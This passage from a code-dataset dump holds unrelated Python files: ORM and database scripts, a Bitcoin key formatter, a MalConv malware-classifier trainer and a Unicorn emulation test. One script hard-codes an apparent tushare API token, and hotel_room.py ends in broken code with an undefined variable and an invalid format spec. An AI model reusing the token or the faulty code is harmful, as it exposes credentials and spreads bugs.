Meta:\n model = ModelYearReportMake\n fields = (\n 'make',\n )\n"},"size":{"kind":"number","value":279,"string":"279"}}},{"rowIdx":874,"cells":{"max_stars_repo_path":{"kind":"string","value":"AutomateTheBoringStuff/sameName.py"},"max_stars_repo_name":{"kind":"string","value":"pythoncoder999/Python"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024508"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 26 23:49:56 2019\n\n@author: \n\"\"\"\n\ndef spam():\n eggs = \"spam local\"\n print(eggs) # prints \"spam local\"\n \ndef bacon():\n eggs = \"bacon local\"\n print(eggs) # prints \"bacon local\"\n spam()\n print(eggs) #prints \"bacon local\"\n\neggs = \"global\"\nbacon()\nprint(eggs) #prints \"global\"\n"},"size":{"kind":"number","value":345,"string":"345"}}},{"rowIdx":875,"cells":{"max_stars_repo_path":{"kind":"string","value":"module4-acid-and-database-scalability-tradeoffs/create_titanic.py"},"max_stars_repo_name":{"kind":"string","value":"bbrauser/DS-Unit-3-Sprint-2-SQL-and-Databases"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023575"},"content":{"kind":"string","value":"# imports\nimport psycopg2\nimport pandas as pd\nfrom psycopg2.extras import execute_values\n\n\n# reading in titanic Data\ndf = pd.read_csv('titanic.csv')\n\n\n# renaming columns in order to have them read into elephant\ndf['Siblings/Spouses Aboard'].rename('siblingsspouse', axis=1)\ndf['Parents/Children Aboard'].rename('parentschildren', axis=1)\n\n\n# getting rid of unecessary apostrophies\ndf['Name'] = df['Name'].str.replace(\"'\", \"\")\n\n\n# creds for cloud DB, password is \ndbname = 'cwsewxgg'\nuser = 'cwsewxgg' # ElephantSQL happens to use same name for db and user\npassword = ' ' # Sensitive! Don't share/commit\nhost = 'drona.db.elephantsql.com'\n\n\n# connection to cloud\npg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)\npg_curs = pg_conn.cursor()\n\n\n# creating Titanic Table\ncreate_titanic_table = \"\"\"\nDROP TABLE IF EXISTS Titanic;\nCREATE TABLE Titanic (\n index INT,\n Survived INT,\n Pclass INT,\n Name TEXT,\n Sex TEXT,\n Age REAL,\n siblingsspouse INT,\n parentschildren INT,\n Fare REAL\n);\n\"\"\"\n\n\n# running table and committing table\npg_curs.execute(create_titanic_table)\npg_conn.commit()\n\n\n# using the execute_values function - Would like to go over this again to enhance my understanding\nexecute_values(pg_curs, \"\"\"\nINSERT INTO Titanic\n(Survived, Pclass, Name, Sex, Age, siblingsspouse, parentschildren, Fare)\nVALUES %s;\n\"\"\", [tuple(row) for row in df.values])\n\n\n# commit\npg_conn.commit()\npg_curs.execute(\"\"\"\nSELECT *\nFROM Titanic\nLIMIT 1;\n\"\"\")\n\n\n# printing to validate\nprint(pg_curs.fetchall())"},"size":{"kind":"number","value":1554,"string":"1,554"}}},{"rowIdx":876,"cells":{"max_stars_repo_path":{"kind":"string","value":"demo/tushare_native/broad_market_demo.py"},"max_stars_repo_name":{"kind":"string","value":"WZYStudio/QuantJob"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024099"},"content":{"kind":"string","value":"import tushare as ts\n\n# 这个数据里有vol, ma5,ma10什么的,还是好用的\nif __name__ == '__main__':\n ts.set_token('c88ef7fb2542e2f89e9c79c2d22ce2421511da6af7f905f60c7a29b4')\n days_deal = ts.get_hist_data('600584', start='2020-05-18', end='2020-05-21')\n print(days_deal)\n\n\n"},"size":{"kind":"number","value":261,"string":"261"}}},{"rowIdx":877,"cells":{"max_stars_repo_path":{"kind":"string","value":"orm/manager.py"},"max_stars_repo_name":{"kind":"string","value":"draihal/simple_orm_sqlite"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023771"},"content":{"kind":"string","value":"from .db_helpers import attrs, copy_attrs, render_create_table_stmt\n\n\nclass Manager:\n\n def __init__(self, db, model, type_check=True):\n self.db = db\n self.model = model\n self.table_name = model.__name__\n self.type_check = type_check\n if not self._hastable():\n self.db.executescript(render_create_table_stmt(self.model))\n\n def all(self):\n result = self.db.execute(f'SELECT * FROM {self.table_name}')\n return (self.create(**row) for row in result.fetchall())\n\n def create(self, **kwargs):\n obj = object.__new__(self.model)\n obj.__dict__ = kwargs\n return obj\n\n def delete(self, obj):\n sql = 'DELETE from %s WHERE id = ?'\n self.db.execute(sql % self.table_name, obj.id)\n\n def get(self, id):\n sql = f'SELECT * FROM {self.table_name} WHERE id = ?'\n result = self.db.execute(sql, id)\n row = result.fetchone()\n if not row:\n msg = 'Object%s with id does not exist: %s' % (self.model, id)\n raise ValueError(msg)\n return self.create(**row)\n\n def has(self, id):\n sql = f'SELECT id FROM {self.table_name} WHERE id = ?'\n result = self.db.execute(sql, id)\n return True if result.fetchall() else False\n\n def save(self, obj):\n if 'id' in obj.__dict__ and self.has(obj.id):\n msg = 'Object%s id already registred: %s' % (self.model, obj.id)\n raise ValueError(msg)\n clone = copy_attrs(obj, remove=['id'])\n self.type_check and self._isvalid(clone)\n column_names = '%s' % ', '.join(clone.keys())\n column_references = '%s' % ', '.join('?' for i in range(len(clone)))\n sql = 'INSERT INTO %s (%s) VALUES (%s)'\n sql = sql % (self.table_name, column_names, column_references)\n result = self.db.execute(sql, *clone.values())\n obj.id = result.lastrowid\n return obj\n\n def update(self, obj):\n clone = copy_attrs(obj, remove=['id'])\n self.type_check and self._isvalid(clone)\n where_expressions = '= ?, '.join(clone.keys()) + '= ?'\n sql = 'UPDATE %s SET %s WHERE id = ?' % (self.table_name, where_expressions)\n self.db.execute(sql, *(list(clone.values()) + [obj.id]))\n\n def _hastable(self):\n sql = 'SELECT name len FROM sqlite_master WHERE type = ? AND name = ?'\n result = self.db.execute(sql, 'table', self.table_name)\n return True if result.fetchall() else False\n\n def _isvalid(self, attr_values):\n attr_types = attrs(self.model)\n value_types = {a: v.__class__ for a, v in attr_values.items()}\n\n for attr, value_type in value_types.items():\n if value_type is not attr_types[attr]:\n msg = \"%s value should be type %s not %s\"\n raise TypeError(msg % (attr, attr_types[attr], value_type))\n"},"size":{"kind":"number","value":2867,"string":"2,867"}}},{"rowIdx":878,"cells":{"max_stars_repo_path":{"kind":"string","value":"SoftUni-Basic/conditional_statements_advanced/exercises/hotel_room.py"},"max_stars_repo_name":{"kind":"string","value":"Darkartt/SoftUni"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024389"},"content":{"kind":"string","value":"month = input()\ndays_sleeping = int(input())\n\nprice_studio = 0\nprice_apartment = 0\n\nif month == \"May\" or month == \"October\":\n price_studio = days_sleeping * 50\n price_apartment = days_sleeping * 65\n if days_sleeping > 14:\n price_studio *= 0.70\n elif days_sleeping > 7:\n price_studio *= 0.95\n\nif month == \"June\" or month == \"September\":\n price_studio = days_sleeping * 75.20\n price_apartment = days_sleeping * 68.70\n if days_sleeping > 14:\n price_studio *= 0.80\n\nif month == \"July\" or month == \"August\":\n price_studio = days_sleeping * 76\n price_apartment = days_sleeping * 77\n\nif days_sleeping > 14:\n price_apartment *= 0.90\n\n\nprint(f\"Apartment: {price_apartment:.2f} lv.\")\nprint(f\"Studio: {price_studio:.2f} lv.\")\n\nif diff < 59:\n print(\"Early\")\n print(f\"{diff} before the start\")\nelif diff > 59:\n hours = diff // 60\n minutes = diff = 60\n print(\"Early\")\n print(f\"{hours}:{minutes:.2d} hours before the start\")"},"size":{"kind":"number","value":978,"string":"978"}}},{"rowIdx":879,"cells":{"max_stars_repo_path":{"kind":"string","value":"migrations/versions/0d2523c0cb8a_.py"},"max_stars_repo_name":{"kind":"string","value":"monstersun/blog"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023130"},"content":{"kind":"string","value":"\"\"\"empty message\n\nRevision ID: 0d2523c0cb8a\nRevises: \nCreate Date: 2017-12-13 19:29:39.010490\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = ''\ndown_revision = ''\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('Post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.TEXT(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('auther_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['auther_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_Post_timestamp'), 'Post', ['timestamp'], unique=False)\n op.add_column('users', sa.Column('avatar_hash', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'avatar_hash')\n op.drop_index(op.f('ix_Post_timestamp'), table_name='Post')\n op.drop_table('Post')\n # ### end Alembic commands ###\n"},"size":{"kind":"number","value":1174,"string":"1,174"}}},{"rowIdx":880,"cells":{"max_stars_repo_path":{"kind":"string","value":"mkrandomkeys.py"},"max_stars_repo_name":{"kind":"string","value":"jadeblaquiere/keymaster"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024286"},"content":{"kind":"string","value":"#!/usr/bin/python\n# Copyright (c) 2016, <>\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of ecpy nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom ecpy.point import Point, Generator\nimport ecpy.curves as curves\nfrom Crypto.Random import random\nfrom Crypto.Hash import RIPEMD\nfrom hashlib import sha256\nimport hashlib\nfrom binascii import hexlify, unhexlify\nfrom base58 import b58encode, b58decode\n\n# set up elliptic curve environment\nc = curves.curve_secp256k1\nPoint.set_curve(c)\nG = Generator(c['G'][0], c['G'][1])\n\n#mainnet\npub_prefix = '00'\nprv_prefix = '80'\n#testnet\npub_prefix = '6f'\nprv_prefix = 'ef'\n#simtest\npub_prefix = '3f'\nprv_prefix = '64'\n#ctindigonet\npub_prefix = '1c'\nprv_prefix = 'bb'\n#ctrednet\npub_prefix = '50'\nprv_prefix = 'a3'\n\npub_prefix = '1c'\nprv_prefix = 'bb'\n\n\ndef priv_key_fmt(prefix, keyhx):\n # generate WIF format\n # see: https://en.bitcoin.it/wiki/Wallet_import_format\n # add header prefix\n h_key = prefix + keyhx\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_key + cksum))\n\ndef priv_key_fmt_C(prefix, keyhx):\n # generate WIF format\n # see: https://en.bitcoin.it/wiki/Wallet_import_format\n # add header prefix\n h_key = prefix + keyhx + '01'\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_key + cksum))\n\ndef priv_key_decode(keyb58):\n raw = hexlify(b58decode(keyb58))\n h_key = raw[:66]\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n if cksum != raw[66:].decode('utf-8'):\n raise ValueError('checksum mismatch')\n return h_key[2:].decode('utf-8')\n\ndef priv_key_decode_C(keyb58):\n raw = hexlify(b58decode(keyb58))\n h_key = raw[:68]\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n if raw[66:68].decode('utf-8') != '01':\n raise ValueError('format error')\n if cksum != raw[68:].decode('utf-8'):\n raise ValueError('checksum mismatch')\n return h_key[2:66].decode('utf-8')\n\ndef pub_key_fmt(prefix, keyhx):\n # generate V1 Address format\n # see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses\n # hash key - sha256 then ripemd160\n h = RIPEMD.new(sha256(unhexlify(keyhx)).digest())\n # add header prefix\n h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_hashkey + cksum))\n\ndef pub_key_fmt_C(prefix, keyhx):\n # generate V1 Address format\n # see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses\n # hash key - sha256 then ripemd160\n keyval = keyhx\n keybin = int(keyhx,16)\n if keyhx[:2] == '04':\n keyval = ('03' if (keybin % 2) else '02') + keyhx[2:66]\n elif (keyhx[:2] != '02') and (keyhx[:2] != '03'):\n raise ValueError('input is not ECC point format')\n print('keyval = ' + keyval)\n h = RIPEMD.new(sha256(unhexlify(keyval)).digest())\n # add header prefix\n h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_hashkey + cksum))\n\nif __name__ == '__main__':\n # private key is a random number between 1 and n \n # (where n is \"order\" of curve generator point G)\n p = random.randint(1,c['n']-1)\n # p = 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D\n # p = 0x1111111111111111111111111111111111111111111111111111111111111111;\n phx = '%064x' % p\n print(\"PRIVATE KEY MATH : \")\n print('rand privkey = ' + phx)\n \n wif_priv = priv_key_fmt(prv_prefix, phx)\n print(\"WIF privkey = \" + wif_priv)\n if p == 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D:\n assert wif_priv == ''\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_priv == ''\n \n #check that we can recover p from WIF\n rhx = priv_key_decode(wif_priv)\n # print('rxh, phx =', rhx, phx)\n assert rhx == phx\n \n wif_priv_C = priv_key_fmt_C(prv_prefix, phx)\n print(\"WIF privkey Compressed = \" + wif_priv_C)\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_priv_C == ''\n \n #check that we can recover p from WIF\n rhx = priv_key_decode_C(wif_priv_C)\n # print('rxh, phx =', rhx, phx)\n assert rhx == phx\n \n print(\"PUBLIC KEY MATH : \")\n # p = 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725\n P = G * p\n Pa = P.affine()\n pbhx = '04' + ('%064x' % Pa[0]) + ('%064x' % Pa[1])\n print(\"point long fmt = \" + pbhx)\n wif_pub = pub_key_fmt(pub_prefix, pbhx)\n print(\"WIF pubkey = \" + wif_pub)\n if p == 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725:\n assert wif_pub == ''\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_pub == ''\n \n wif_pub_C = pub_key_fmt_C(pub_prefix, pbhx)\n print(\"WIF pubkey Compressed = \" + wif_pub_C)\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_pub_C == ''\n \n if False:\n for i in range(0,255):\n ihx = '%02x' % i\n print(ihx + ' :priv: ' + priv_key_fmt(ihx, phx) + ' ' + priv_key_fmt_C(ihx, phx)) \n\n for i in range(0,255):\n ihx = '%02x' % i\n print(ihx + ' :pub: ' + pub_key_fmt(ihx, pbhx))\n \n if False:\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('rhx ' + refhx)\n print('rdvx ' + rdehx)\n print('rdpx ' + rdphx)\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('crhx ' + refhx)\n print('crdvx ' + rdehx)\n print('crdpx ' + rdphx)\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('zrhx ' + refhx)\n print('zrdvx ' + rdehx)\n print('zrdpx ' + rdphx)\n"},"size":{"kind":"number","value":8238,"string":"8,238"}}},{"rowIdx":881,"cells":{"max_stars_repo_path":{"kind":"string","value":"examples/drf_pdf_examples/drf_pdf_examples/urls.py"},"max_stars_repo_name":{"kind":"string","value":"fasih/drf-pdf"},"max_stars_count":{"kind":"number","value":27,"string":"27"},"id":{"kind":"string","value":"2023714"},"content":{"kind":"string","value":"from django.conf.urls import patterns, url\nfrom simple.views import SimpleExample\n\n\nurlpatterns = patterns(\n '',\n url(r'^simple/$', SimpleExample.as_view()),\n)\n"},"size":{"kind":"number","value":166,"string":"166"}}},{"rowIdx":882,"cells":{"max_stars_repo_path":{"kind":"string","value":"malconv-microsoft.py"},"max_stars_repo_name":{"kind":"string","value":"PowerLZY/MalConv-Pytorch"},"max_stars_count":{"kind":"number","value":9,"string":"9"},"id":{"kind":"string","value":"2022828"},"content":{"kind":"string","value":"import sys\nimport os\nimport time\nfrom src.model import *\nfrom src.util import *\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nfrom sklearn.model_selection import train_test_split\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nlabel_path = \"/public/malware_dataset/kaggle_microsoft_9_10000/\"\ntrain_data_path = label_path + \"bytes/\" # Training data\ntrain_label_path = label_path + \"kaggle_microsoft_trainlabels.csv\" # Training label\n#valid_label_path = label_path + \"example-valid-label.csv\" # Validation Label\n\n#name\nexp_name = \"malconv-classification\"\n\n# Parameter\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\" # single-GPU\n\nuse_gpu = True #\nuse_cpu = 32 # Number of cores to use for data loader\ndisplay_step = 5 # Std output update rate during training 和 保存训练结果步长\ntest_step = 50 # Test per n step\nlearning_rate = 0.0001 #\nmax_step = 1000 # Number of steps to train\nbatch_size = 768 #\nfirst_n_byte = (\n 100000 # First N bytes of a PE file as the input of MalConv (defualt: 2 million)\n)\nwindow_size = 512 # Kernel size & stride for Malconv (defualt : 500)\n\n# output path\nlog_dir = \"/log/\"\npred_dir = \"/pred/\"\ncheckpoint_dir = \"/checkpoint/\"\nlog_file_path = log_dir + exp_name + \".log\"\nchkpt_acc_path = checkpoint_dir + exp_name + \"1000.pt\"\npred_path = pred_dir + exp_name + \".pred\"\n\ndf = pd.read_csv(train_label_path)\ntrain, valid, train_label, valid_label = train_test_split(\n df[\"Id\"],\n df[\"Class\"],\n test_size=0.2,\n stratify=df[\"Class\"],\n random_state=100,\n)\n\"\"\"\n# Dataset preparation\nclass ExeDataset(Dataset):\n\tdef __init__(self, fp_list, data_path, label_list, first_n_byte=2000000):\n\t\tself.fp_list = fp_list\n\t\tself.data_path = data_path\n\t\tself.label_list = label_list\n\t\tself.first_n_byte = first_n_byte\n\n\tdef __len__(self):\n\t\treturn len(self.fp_list)\n\n\tdef __getitem__(self, idx):\n\t\ttry:\n\t\t\twith open(self.data_path + self.fp_list[idx],'rb') as f:\n\t\t\t\ttmp = [i+1 for i in f.read()[:self.first_n_byte]] # index 0 will be special padding index 每个值加一\n\t\t\t\ttmp = tmp+[0]*(self.first_n_byte-len(tmp))\n\t\texcept:\n\t\t\twith open(self.data_path + self.fp_list[idx].lower(),'rb') as f:\n\t\t\t\ttmp = [i+1 for i in f.read()[:self.first_n_byte]]\n\t\t\t\ttmp = tmp+[0]*(self.first_n_byte-len(tmp))\n\n\t\treturn np.array(tmp), np.array([self.label_list[idx]])\n\"\"\"\n\ntrainset = pd.DataFrame({\"id\": train, \"labels\": train_label})\nvalidset = pd.DataFrame({\"id\": valid, \"labels\": valid_label})\ntrainloader = DataLoader(\n ExeDataset(\n list(trainset[\"id\"]), train_data_path, list(trainset[\"labels\"]), first_n_byte\n ),\n batch_size=batch_size,\n shuffle=False,\n num_workers=use_cpu,\n pin_memory=True,\n)\nvalidloader = DataLoader(\n ExeDataset(\n list(validset[\"id\"]), train_data_path, list(validset[\"labels\"]), first_n_byte\n ),\n batch_size=batch_size,\n shuffle=False,\n num_workers=use_cpu,\n pin_memory=True,\n)\nUSE_CUDA = torch.cuda.is_available()\ndevice = torch.device(\"cuda:1\" if USE_CUDA else \"cpu\")\n\nmalconv = MalConv(input_length=first_n_byte, window_size=window_size)\nmalconv = nn.DataParallel(malconv, device_ids=[1,2,3]) # multi-GPU\n\n#malconv = MalConvBase(8, 4096, 128, 32)\nbce_loss = nn.BCEWithLogitsLoss()\nce_loss = nn.CrossEntropyLoss()\nadam_optim = optim.Adam([{\"params\": malconv.parameters()}], lr=learning_rate)\nsigmoid = nn.Sigmoid()\n\nif use_gpu:\n malconv = malconv.to(device)\n bce_loss = bce_loss.to(device)\n sigmoid = sigmoid.to(device)\n\nstep_msg = \"step-{}-loss-{:.6f}-acc-{:.4f}-time-{:.2f}s\"\nvalid_msg = \"step-{}-tr_loss-{:.6f}-tr_acc-{:.4f}-val_loss-{:.6f}-val_acc-{:.4f}\"\nlog_msg = \"{}, {:.6f}, {:.4f}, {:.6f}, {:.4f}, {:.2f}\"\nhistory = {}\nhistory[\"tr_loss\"] = []\nhistory[\"tr_acc\"] = []\ntrain_acc = [] # 保存训练结果\n\nvalid_best_acc = 0.0\ntotal_step = 0\nstep_cost_time = 0\nvalid_idx = list(validset[\"id\"])\n\nwhile total_step < max_step:\n\n # Training\n for step, batch_data in enumerate(trainloader):\n start = time.time()\n\n adam_optim.zero_grad()\n\n cur_batch_size = batch_data[0].size(0)\n\n exe_input = batch_data[0].to(device) if use_gpu else batch_data[0]\n exe_input = Variable(exe_input.long(), requires_grad=False)\n\n label = batch_data[1].to(device) if use_gpu else batch_data[1]\n label = Variable(label, requires_grad=False)\n label = label.squeeze() - 1\n\n pred = malconv(exe_input)\n loss = ce_loss(pred, label)\n loss.backward()\n adam_optim.step()\n\n _, predicted = torch.max(pred.data, 1)\n train_Macc = (label.cpu().data.numpy().astype(int) == (predicted.cpu().data.numpy()).astype(int)).sum().item()\n train_Macc = train_Macc / cur_batch_size\n\n if (step + 1) % display_step == 0:\n print(\"train:{}\".format(train_Macc))\n\n total_step += 1\n # Interupt for validation\n if total_step % test_step == 0:\n break\n\n for step, val_batch_data in enumerate(validloader):\n\n cur_batch_size = val_batch_data[0].size(0)\n\n exe_input = val_batch_data[0].to(device) if use_gpu else val_batch_data[0]\n exe_input = Variable(exe_input.long(), requires_grad=False)\n\n label = val_batch_data[1].to(device) if use_gpu else val_batch_data[1]\n label = Variable(label, requires_grad=False)\n label = label.squeeze() - 1\n\n pred = malconv(exe_input)\n loss = ce_loss(pred, label)\n # loss.backward()\n # adam_optim.step()\n\n _, predicted = torch.max(pred.data, 1)\n val_Macc = (label.cpu().data.numpy().astype(int) == (predicted.cpu().data.numpy()).astype(int)).sum().item()\n val_Macc = val_Macc / cur_batch_size\n\n if (step + 1) % display_step == 0:\n print(\"test:{}\".format(val_Macc))\n\n\n\n"},"size":{"kind":"number","value":5763,"string":"5,763"}}},{"rowIdx":883,"cells":{"max_stars_repo_path":{"kind":"string","value":"chandralc/config.py"},"max_stars_repo_name":{"kind":"string","value":"sammarth-k/Chandra-Lightcurve-Download"},"max_stars_count":{"kind":"number","value":27,"string":"27"},"id":{"kind":"string","value":"2023922"},"content":{"kind":"string","value":"\"\"\"Create configuration files.\"\"\"\n\n# PSL modules\nimport os\nimport inspect\n\n# chandralc modules\nfrom chandralc import convert\n\nclc_path = os.path.dirname(inspect.getfile(convert))\n\n\ndef mpl_backend(switch=False):\n \"\"\"Switches between agg and default matplotlib backend.\n\n Parameters\n ----------\n switch: bool\n Turn agg on or off, by default False\n \"\"\"\n\n with open(clc_path + \"/config/mpl_backend.chandralc\", \"w\") as f:\n if switch is False:\n f.write(\"False\")\n else:\n f.write(\"True\")\n"},"size":{"kind":"number","value":542,"string":"542"}}},{"rowIdx":884,"cells":{"max_stars_repo_path":{"kind":"string","value":"util/unicorn_test.py"},"max_stars_repo_name":{"kind":"string","value":"Pusty/Obfuscat"},"max_stars_count":{"kind":"number","value":7,"string":"7"},"id":{"kind":"string","value":"2024327"},"content":{"kind":"string","value":"import sys\nfrom unicorn import *\nfrom unicorn.arm_const import *\n\nref = open(sys.argv[1], \"rb\")\nref_data = ref.read()\nref.close()\n\nmu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)\nmu.mem_map(0x1000000, 2 * 1024 * 1024)\nmu.mem_map(0x2000000, 2 * 1024 * 1024)\nmu.mem_map(0x4000000, 2 * 1024 * 1024)\nmu.mem_write(0x1000000, ref_data)\n\nmu.mem_write(0x2000000, b'SECRET')\n\n\nmu.reg_write(UC_ARM_REG_R0, 0x2000000)\nmu.reg_write(UC_ARM_REG_R1, 6)\nmu.reg_write(UC_ARM_REG_R2, 0)\nmu.reg_write(UC_ARM_REG_R3, 0)\n\nmu.reg_write(UC_ARM_REG_SP, 0x4010000)\nmu.reg_write(UC_ARM_REG_LR, 0xDEADC0DE)\n\ntry:\n mu.emu_start(0x1000001, 0x1000000 + len(ref_data))\nexcept Exception as e:\n if mu.reg_read(UC_ARM_REG_PC) != 0xDEADC0DE:\n raise e\n\nprint(mu.reg_read(UC_ARM_REG_R0))"},"size":{"kind":"number","value":751,"string":"751"}}},{"rowIdx":885,"cells":{"max_stars_repo_path":{"kind":"string","value":"rmp_nav/common/image_combiner.py"},"max_stars_repo_name":{"kind":"string","value":"KH-Kyle/rmp_nav"},"max_stars_count":{"kind":"number","value":30,"string":"30"},"id":{"kind":"string","value":"2022863"},"content":{"kind":"string","value":"import numpy as np\nimport cv2\n\n\ndef _pad_width_center(w, target_w):\n left = (target_w - w) // 2\n right = target_w - w - left\n return left, right\n\n\ndef _pad_width_right(w, target_w):\n return 0, target_w - w\n\n\ndef _pad_height_center(h, target_h):\n top = (target_h - h) // 2\n bottom = target_h - h - top\n return top, bottom\n\n\ndef _pad_height_bottom(h, target_h):\n return 0, target_h - h\n\n\ndef VStack(*imgs, align='center'):\n max_w = max([_.shape[1] for _ in imgs])\n imgs_padded = []\n\n if align == 'center':\n for img in imgs:\n left, right = _pad_width_center(img.shape[1], max_w)\n imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))\n\n elif align == 'left':\n for img in imgs:\n left, right = _pad_width_right(img.shape[1], max_w)\n imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))\n\n else:\n raise ValueError('Unsupported alignment %s' % align)\n\n return np.concatenate(imgs_padded, axis=0)\n\n\ndef HStack(*imgs, align='center'):\n max_h = max([_.shape[0] for _ in imgs])\n\n imgs_padded = []\n\n if align == 'center':\n for img in imgs:\n top, bottom = _pad_height_center(img.shape[0], max_h)\n imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))\n\n elif align == 'top':\n for img in imgs:\n top, bottom = _pad_height_bottom(img.shape[0], max_h)\n imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))\n\n else:\n raise ValueError('Unsupported alignment %s' % align)\n\n return np.concatenate(imgs_padded, axis=1)\n\n\ndef Grid(*imgs, n_col=1, align='center'):\n chunks = [imgs[i:i + n_col] for i in range(0, len(imgs), n_col)]\n row_imgs = [HStack(*_, align=align) for _ in chunks]\n return VStack(*row_imgs, align=align)\n"},"size":{"kind":"number","value":1917,"string":"1,917"}}},{"rowIdx":886,"cells":{"max_stars_repo_path":{"kind":"string","value":"render/scene/SceneGnomon.py"},"max_stars_repo_name":{"kind":"string","value":"bvraghav/standible"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024374"},"content":{"kind":"string","value":"import logging as lg\n\nfrom utils import Get, Set\n\nfrom . SceneDefault import SceneDefault\n\nfrom . Taxonomy import Taxonomy\nfrom . CameraGnomon import CameraGnomon\nfrom . Light import Light\nfrom . Gnomon import Gnomon\nfrom . Render import Render\n\nclass SceneGnomon(SceneDefault) :\n def setup(self) :\n lg.debug(\n 'Setting up scene from data: %s',\n Get.config('runtime/scene')\n )\n\n self.clear_scene()\n\n Taxonomy().setup()\n CameraGnomon.setup()\n Light.setup()\n Gnomon.setup()\n 